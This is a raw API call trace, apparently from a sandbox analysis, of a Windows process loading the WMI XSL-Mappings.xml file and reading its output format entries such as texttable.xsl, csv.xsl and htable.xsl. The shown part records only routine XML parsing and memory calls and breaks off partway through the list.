[0245.015] free (_Block=0xe6f90) [0245.016] RegCloseKey (hKey=0x0) returned 0x6 [0245.016] CoCreateInstance (in: rclsid=0xff437410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4373f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1af518 | out: ppv=0x1af518*=0x22071d0) returned 0x0 [0245.037] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x22071d0, xmlSource=0x1af660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0xe6f30), isSuccessful=0x1af6d0 | out: isSuccessful=0x1af6d0*=0xffff) returned 0x0 [0245.191] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x22071d0, DOMElement=0x1af510 | out: DOMElement=0x1af510*=0x220bc50) returned 0x0 [0245.191] malloc (_Size=0x18) returned 0xe6f30 [0245.191] IXMLDOMElement:getElementsByTagName (in: This=0x220bc50, tagName="XSLFORMAT", resultList=0x1af520 | out: resultList=0x1af520*=0x2209cc0) returned 0x0 [0245.192] free (_Block=0xe6f30) [0245.192] IXMLDOMNodeList:get_length (in: This=0x2209cc0, listLength=0x1af6e8 | out: listLength=0x1af6e8*=21) returned 0x0 [0245.192] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=0, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.193] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="texttable.xsl") returned 0x0 [0245.193] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.193] malloc (_Size=0x18) returned 0xe6f30 [0245.193] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.193] free (_Block=0xe6f30) [0245.193] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0245.193] malloc (_Size=0x18) returned 0xe6f30 [0245.193] malloc (_Size=0x18) returned 0xe6f50 [0245.193] malloc (_Size=0x30) returned 0xe8080 [0245.193] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.193] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.194] IUnknown:Release (This=0x220a280) returned 0x0 [0245.194] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=1, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.194] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="textvaluelist.xsl") returned 0x0 [0245.194] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.194] malloc (_Size=0x18) returned 0xe6f90 [0245.194] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.194] free (_Block=0xe6f90) [0245.194] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0245.194] malloc (_Size=0x18) returned 0xec560 [0245.194] malloc (_Size=0x18) returned 0xec580 [0245.194] SysStringLen (param_1="VALUE") returned 0x5 [0245.194] SysStringLen (param_1="TABLE") returned 0x5 [0245.194] SysStringLen (param_1="TABLE") returned 0x5 [0245.194] SysStringLen (param_1="VALUE") returned 0x5 [0245.194] malloc (_Size=0x30) returned 0xe80c0 [0245.194] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.194] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.194] IUnknown:Release (This=0x220a280) returned 0x0 [0245.194] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=2, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.195] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="textvaluelist.xsl") returned 0x0 [0245.195] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.195] malloc (_Size=0x18) returned 0xec5a0 [0245.195] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.195] free (_Block=0xec5a0) [0245.195] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0245.195] malloc (_Size=0x18) returned 0xec5a0 [0245.195] malloc (_Size=0x18) returned 0xec5c0 [0245.195] SysStringLen (param_1="LIST") returned 0x4 [0245.195] SysStringLen (param_1="TABLE") returned 0x5 [0245.195] malloc (_Size=0x30) returned 0xe8100 [0245.195] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.195] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.195] IUnknown:Release (This=0x220a280) returned 0x0 [0245.195] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=3, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.195] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="rawxml.xsl") returned 0x0 [0245.195] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.196] malloc (_Size=0x18) returned 0xec5e0 [0245.196] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.196] free (_Block=0xec5e0) [0245.196] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0245.196] malloc (_Size=0x18) returned 0xec5e0 [0245.196] malloc (_Size=0x18) returned 0xec600 [0245.196] SysStringLen (param_1="RAWXML") returned 0x6 [0245.196] SysStringLen (param_1="TABLE") returned 0x5 [0245.196] SysStringLen (param_1="RAWXML") returned 0x6 [0245.196] SysStringLen (param_1="LIST") returned 0x4 [0245.196] SysStringLen (param_1="LIST") returned 0x4 [0245.196] SysStringLen (param_1="RAWXML") returned 0x6 [0245.196] malloc (_Size=0x30) returned 0xe8140 [0245.196] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.196] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.196] IUnknown:Release (This=0x220a280) returned 0x0 [0245.196] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=4, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.197] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="htable.xsl") returned 0x0 [0245.197] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.197] malloc (_Size=0x18) returned 0xec620 [0245.197] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.197] free (_Block=0xec620) [0245.197] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0245.197] malloc (_Size=0x18) returned 0xec620 [0245.197] malloc (_Size=0x18) returned 0xec640 [0245.197] SysStringLen (param_1="HTABLE") returned 0x6 [0245.197] SysStringLen (param_1="TABLE") returned 0x5 [0245.197] SysStringLen (param_1="HTABLE") returned 0x6 [0245.197] SysStringLen (param_1="LIST") returned 0x4 [0245.197] malloc (_Size=0x30) returned 0xe8180 [0245.197] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.197] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.197] IUnknown:Release (This=0x220a280) returned 0x0 [0245.197] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=5, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.198] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="hform.xsl") returned 0x0 [0245.198] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.198] malloc (_Size=0x18) returned 0xec660 [0245.198] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.198] free (_Block=0xec660) [0245.198] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0245.198] malloc (_Size=0x18) returned 0xec660 [0245.198] malloc (_Size=0x18) returned 0xec680 [0245.198] SysStringLen (param_1="HFORM") returned 0x5 [0245.198] SysStringLen (param_1="TABLE") returned 0x5 [0245.198] SysStringLen (param_1="HFORM") returned 0x5 [0245.198] SysStringLen (param_1="LIST") returned 0x4 [0245.198] SysStringLen (param_1="HFORM") returned 0x5 [0245.198] SysStringLen (param_1="HTABLE") returned 0x6 [0245.198] malloc (_Size=0x30) returned 0xe81c0 [0245.198] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.198] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.198] IUnknown:Release (This=0x220a280) returned 0x0 [0245.198] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=6, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.199] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="xml.xsl") returned 0x0 [0245.199] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.199] malloc (_Size=0x18) returned 0xec6a0 [0245.199] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.199] free (_Block=0xec6a0) [0245.199] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0245.199] malloc (_Size=0x18) returned 0xec6a0 [0245.199] malloc (_Size=0x18) returned 0xec6c0 [0245.199] SysStringLen (param_1="XML") returned 0x3 [0245.199] SysStringLen (param_1="TABLE") returned 0x5 [0245.199] SysStringLen (param_1="XML") returned 0x3 [0245.199] SysStringLen (param_1="VALUE") returned 0x5 [0245.199] SysStringLen (param_1="VALUE") returned 0x5 [0245.199] SysStringLen (param_1="XML") returned 0x3 [0245.199] malloc (_Size=0x30) returned 0xe8200 [0245.199] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.199] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.199] IUnknown:Release (This=0x220a280) returned 0x0 [0245.199] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=7, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.200] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="mof.xsl") returned 0x0 [0245.200] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.200] malloc (_Size=0x18) returned 0xec6e0 [0245.200] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.200] free (_Block=0xec6e0) [0245.200] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0245.200] malloc (_Size=0x18) returned 0xec6e0 [0245.200] malloc (_Size=0x18) returned 0xec700 [0245.200] SysStringLen (param_1="MOF") returned 0x3 [0245.200] SysStringLen (param_1="TABLE") returned 0x5 [0245.200] SysStringLen (param_1="MOF") returned 0x3 [0245.200] SysStringLen (param_1="LIST") returned 0x4 [0245.200] SysStringLen (param_1="MOF") returned 0x3 [0245.200] SysStringLen (param_1="RAWXML") returned 0x6 [0245.200] SysStringLen (param_1="LIST") returned 0x4 [0245.200] SysStringLen (param_1="MOF") returned 0x3 [0245.200] malloc (_Size=0x30) returned 0xe8240 [0245.200] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.201] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.201] IUnknown:Release (This=0x220a280) returned 0x0 [0245.201] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=8, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.201] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="csv.xsl") returned 0x0 [0245.201] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.201] malloc (_Size=0x18) returned 0xec720 [0245.201] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.201] free (_Block=0xec720) [0245.201] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0245.201] malloc (_Size=0x18) returned 0xec720 [0245.201] malloc (_Size=0x18) returned 0xec740 [0245.201] SysStringLen (param_1="CSV") returned 0x3 [0245.201] SysStringLen (param_1="TABLE") returned 0x5 [0245.201] SysStringLen (param_1="CSV") returned 0x3 [0245.201] SysStringLen (param_1="LIST") returned 0x4 [0245.201] SysStringLen (param_1="CSV") returned 0x3 [0245.201] SysStringLen (param_1="HTABLE") returned 0x6 [0245.201] SysStringLen (param_1="CSV") returned 0x3 [0245.201] SysStringLen (param_1="HFORM") returned 0x5 [0245.202] malloc (_Size=0x30) returned 0xe8280 [0245.202] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.202] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.202] IUnknown:Release (This=0x220a280) returned 0x0 [0245.202] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=9, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.202] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="texttable.xsl") returned 0x0 [0245.202] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.202] malloc (_Size=0x18) returned 0xec760 [0245.202] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.202] free (_Block=0xec760) [0245.202] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0245.202] malloc (_Size=0x18) returned 0xec760 [0245.202] malloc (_Size=0x18) returned 0xec780 [0245.202] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.202] SysStringLen (param_1="TABLE") returned 0x5 [0245.202] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.202] SysStringLen (param_1="VALUE") returned 0x5 [0245.202] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.202] SysStringLen (param_1="XML") returned 0x3 [0245.203] SysStringLen (param_1="XML") returned 0x3 [0245.203] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.203] malloc (_Size=0x30) returned 0xe82c0 [0245.203] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.203] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.203] IUnknown:Release (This=0x220a280) returned 0x0 [0245.203] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=10, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.203] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="texttable.xsl") returned 0x0 [0245.203] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.203] malloc (_Size=0x18) returned 0xec7a0 [0245.203] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.203] free (_Block=0xec7a0) [0245.203] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0245.203] malloc (_Size=0x18) returned 0xec7a0 [0245.203] malloc (_Size=0x18) returned 0xec7c0 [0245.203] SysStringLen (param_1="texttablewsys") returned 0xd [0245.203] SysStringLen (param_1="TABLE") returned 0x5 [0245.204] SysStringLen (param_1="texttablewsys") returned 0xd [0245.204] SysStringLen (param_1="XML") returned 0x3 [0245.204] SysStringLen (param_1="texttablewsys") returned 0xd [0245.204] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.204] SysStringLen (param_1="XML") returned 0x3 [0245.204] SysStringLen (param_1="texttablewsys") returned 0xd [0245.204] malloc (_Size=0x30) returned 0xe8300 [0245.204] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.204] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.204] IUnknown:Release (This=0x220a280) returned 0x0 [0245.204] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=11, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.204] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="texttable.xsl") returned 0x0 [0245.204] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.204] malloc (_Size=0x18) returned 0xec7e0 [0245.204] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.204] free (_Block=0xec7e0) [0245.204] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0245.204] malloc (_Size=0x18) returned 0xec7e0 [0245.204] malloc (_Size=0x18) returned 0xec800 [0245.205] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.205] SysStringLen (param_1="TABLE") returned 0x5 [0245.205] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.205] SysStringLen (param_1="XML") returned 0x3 [0245.205] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.205] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.205] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.205] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.205] malloc (_Size=0x30) returned 0xe8340 [0245.205] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.205] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.205] IUnknown:Release (This=0x220a280) returned 0x0 [0245.205] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=12, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.205] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="texttable.xsl") returned 0x0 [0245.205] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.205] malloc (_Size=0x18) returned 0xec820 [0245.205] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.205] free (_Block=0xec820) [0245.205] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0245.206] malloc (_Size=0x18) returned 0xec820 [0245.206] malloc (_Size=0x18) returned 0xec840 [0245.206] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0245.206] SysStringLen (param_1="TABLE") returned 0x5 [0245.206] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0245.206] SysStringLen (param_1="XML") returned 0x3 [0245.206] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0245.206] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.206] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0245.206] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.206] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.206] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0245.206] malloc (_Size=0x30) returned 0xe8380 [0245.206] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.206] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.206] IUnknown:Release (This=0x220a280) returned 0x0 [0245.206] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=13, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.206] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="texttable.xsl") returned 0x0 [0245.206] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.206] malloc (_Size=0x18) returned 0xec860 [0245.207] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.207] free (_Block=0xec860) [0245.207] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0245.207] malloc (_Size=0x18) returned 0xec860 [0245.207] malloc (_Size=0x18) returned 0xec880 [0245.207] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.207] SysStringLen (param_1="TABLE") returned 0x5 [0245.207] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.207] SysStringLen (param_1="XML") returned 0x3 [0245.207] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.207] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.207] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.207] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.207] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.207] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.207] malloc (_Size=0x30) returned 0xe83c0 [0245.207] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.207] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.207] IUnknown:Release (This=0x220a280) returned 0x0 [0245.207] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=14, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.207] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="texttable.xsl") returned 0x0 [0245.208] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.208] malloc (_Size=0x18) returned 0xec8a0 [0245.208] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.208] free (_Block=0xec8a0) [0245.208] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0245.208] malloc (_Size=0x18) returned 0xec8a0 [0245.208] malloc (_Size=0x18) returned 0xec8c0 [0245.208] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0245.208] SysStringLen (param_1="TABLE") returned 0x5 [0245.208] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0245.208] SysStringLen (param_1="XML") returned 0x3 [0245.208] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0245.208] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.208] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0245.208] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.208] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0245.208] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0245.208] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0245.208] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0245.208] malloc (_Size=0x30) returned 0xe8400 [0245.208] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.208] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.209] IUnknown:Release (This=0x220a280) returned 0x0 [0245.209] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=15, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.209] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="htable.xsl") returned 0x0 [0245.209] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.209] malloc (_Size=0x18) returned 0xec8e0 [0245.209] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1af508 | out: namedItem=0x1af508*=0x220a280) returned 0x0 [0245.209] free (_Block=0xec8e0) [0245.209] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1af540 | out: value=0x1af540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0245.209] malloc (_Size=0x18) returned 0xec8e0 [0245.209] malloc (_Size=0x18) returned 0xec900 [0245.209] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0245.209] SysStringLen (param_1="TABLE") returned 0x5 [0245.209] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0245.209] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0245.209] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0245.209] SysStringLen (param_1="XML") returned 0x3 [0245.209] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0245.209] SysStringLen (param_1="texttablewsys") returned 0xd [0245.209] SysStringLen (param_1="XML") returned 0x3 [0245.209] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0245.209] malloc (_Size=0x30) returned 0xe8440 [0245.210] IUnknown:Release (This=0x220bd50) returned 0x0 [0245.210] IUnknown:Release (This=0x22078d0) returned 0x0 [0245.210] IUnknown:Release (This=0x220a280) returned 0x0 [0245.210] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=16, listItem=0x1af4f0 | out: listItem=0x1af4f0*=0x220bd50) returned 0x0 [0245.210] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1af500 | out: text=0x1af500*="htable.xsl") returned 0x0 [0245.210] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1af4f8 | out: attributeMap=0x1af4f8*=0x22078d0) returned 0x0 [0245.210] malloc (_Size=0x18) returned 0xec920 [0245.210] 